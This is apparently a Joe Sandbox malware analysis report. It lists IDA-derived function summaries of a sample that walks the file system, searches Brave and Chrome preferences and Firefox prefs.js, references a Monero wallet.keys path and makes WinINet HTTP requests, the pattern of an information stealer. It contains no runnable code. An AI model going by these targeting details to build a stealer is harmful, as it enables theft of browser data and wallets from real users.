Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 95d488904d922562f53583fae4e1f328cc2c459ddb720e46acf62903a2aee521
Instruction ID: b9af1eb1a95a6fa7295a070b9c008b7c94d9ecabad15174bc0fb82ac67c03c7f
Opcode Fuzzy Hash: 95d488904d922562f53583fae4e1f328cc2c459ddb720e46acf62903a2aee521
Instruction Fuzzy Hash: D14245B2A101089BDB14FB70DD56EEE737DAF59301F404668BD0696182EF349B4DCBA2

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

QPC, xrefs: 6C6538FC
GTC, xrefs: 6C653912
GenuntelineI, xrefs: 6C653639
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
AuthcAMDenti, xrefs: 6C653946

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 00054910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0005492C
FindFirstFileA.KERNEL32(?,?), ref: 00054943
StrCmpCA.SHLWAPI(?,00060FDC), ref: 00054971
StrCmpCA.SHLWAPI(?,00060FE0), ref: 00054987
FindNextFileA.KERNEL32(000000FF,?), ref: 00054B7D
FindClose.KERNEL32(000000FF), ref: 00054B92

Strings

%s\%s, xrefs: 000549FB
%s\*, xrefs: 00054920
%s\%s, xrefs: 000549A4

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 7eaa8c75d75a9f55bcb1909c25ea4b82aa711eadbf7812c2f02234e1a94abf1f
Instruction ID: c5e8f6f7ad7b08ecfc52717b7e40391398d3fa4fbd73e799d83e352e2e43a490
Opcode Fuzzy Hash: 7eaa8c75d75a9f55bcb1909c25ea4b82aa711eadbf7812c2f02234e1a94abf1f
Instruction Fuzzy Hash: B86157B5900218ABDB20EBA0EC49EEB737CBB48701F044599F60996145EF75DB89CFA1

Function 00044880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
Part of subcall function 000447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00044915
StrCmpCA.SHLWAPI(?,00CEF068), ref: 0004493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00044ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00060DDB,00000000,?,?,00000000,?,",00000000,?,00CEF198), ref: 00044DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00044E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00044E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00044E49
InternetCloseHandle.WININET(00000000), ref: 00044EAD
InternetCloseHandle.WININET(00000000), ref: 00044EC5
HttpOpenRequestA.WININET(00000000,00CEF098,?,00CEEA28,00000000,00000000,00400100,00000000), ref: 00044B15

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

InternetCloseHandle.WININET(00000000), ref: 00044ECF

Strings

------, xrefs: 00044B28
", xrefs: 00044BF2
------, xrefs: 000449BD
", xrefs: 00044D33
------, xrefs: 00044C69

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 5cee7d81816b49c91c771da27842832f1d37eaf9ed40313b06d0e73d98a67e0a
Instruction ID: b035aa4bca117b9a942ca4c0de69541eaf68d686833547b960ada533c03ed82e
Opcode Fuzzy Hash: 5cee7d81816b49c91c771da27842832f1d37eaf9ed40313b06d0e73d98a67e0a
Instruction Fuzzy Hash: 1712FC71A10118AADB15EB90DC96FEFB379BF15301F5042A9B90666092EF702F4DCF62

Function 00053EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00053EC3
FindFirstFileA.KERNEL32(?,?), ref: 00053EDA
StrCmpCA.SHLWAPI(?,00060FAC), ref: 00053F08
StrCmpCA.SHLWAPI(?,00060FB0), ref: 00053F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0005406C
FindClose.KERNEL32(000000FF), ref: 00054081

Strings

%s\%s, xrefs: 00053EB7

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 2808a99a9ee3bcbc4b467d8f6cbf3a47347457863d8bd28f81fe6fa86511e07f
Instruction ID: e459e610913564bcd0efa92ed2306fece28ced9e5094184fac8eae01d62a80cd
Opcode Fuzzy Hash: 2808a99a9ee3bcbc4b467d8f6cbf3a47347457863d8bd28f81fe6fa86511e07f
Instruction Fuzzy Hash: FA5188B5900218ABCB24EBB0DC49EEB737CBB48301F04459DF71996041DF759B898F61

Function 0004F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000615B8,00060D96), ref: 0004F71E
StrCmpCA.SHLWAPI(?,000615BC), ref: 0004F76F
StrCmpCA.SHLWAPI(?,000615C0), ref: 0004F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0004FAB1
FindClose.KERNEL32(000000FF), ref: 0004FAC3

Strings

prefs.js, xrefs: 0004F812

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 90270749f256139cd84ca52aafbd7d05c77dcd24a65173d1a277661fb7ece057
Instruction ID: ef6e2afe795681cd68c9b5fcc4f6021c1cb17119dd2b9ccf3f2a3c8dc7fc94ec
Opcode Fuzzy Hash: 90270749f256139cd84ca52aafbd7d05c77dcd24a65173d1a277661fb7ece057
Instruction Fuzzy Hash: F7B13371A001189BDB24FF60DC95EFF7379AF55301F4086A9A90A9A152EF306B4DCF92

Function 000416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0006510C,?,?,?,000651B4,?,?,00000000,?,00000000), ref: 00041923
StrCmpCA.SHLWAPI(?,0006525C), ref: 00041973
StrCmpCA.SHLWAPI(?,00065304), ref: 00041989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00041D40
DeleteFileA.KERNEL32(00000000), ref: 00041DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00041E20
FindClose.KERNEL32(000000FF), ref: 00041E32

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Strings

\*.*, xrefs: 000417F1

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 1daf10d5c4d444773f203d3c0f8345e739f7c6cdff31df82f0b5c9d2b8ae89cc
Instruction ID: 3bc2927d100025557c087f15fc042f100f3c9c8418628b5e4a88463ceb47d5b7
Opcode Fuzzy Hash: 1daf10d5c4d444773f203d3c0f8345e739f7c6cdff31df82f0b5c9d2b8ae89cc
Instruction Fuzzy Hash: 3E12C071A101189BDB15EB60DC96AFF7378BF55301F4042A9B90666092EF706F8DCFA1

Function 0004DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000614B0,00060C2A), ref: 0004DAEB
StrCmpCA.SHLWAPI(?,000614B4), ref: 0004DB33
StrCmpCA.SHLWAPI(?,000614B8), ref: 0004DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0004DDCC
FindClose.KERNEL32(000000FF), ref: 0004DDDE

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
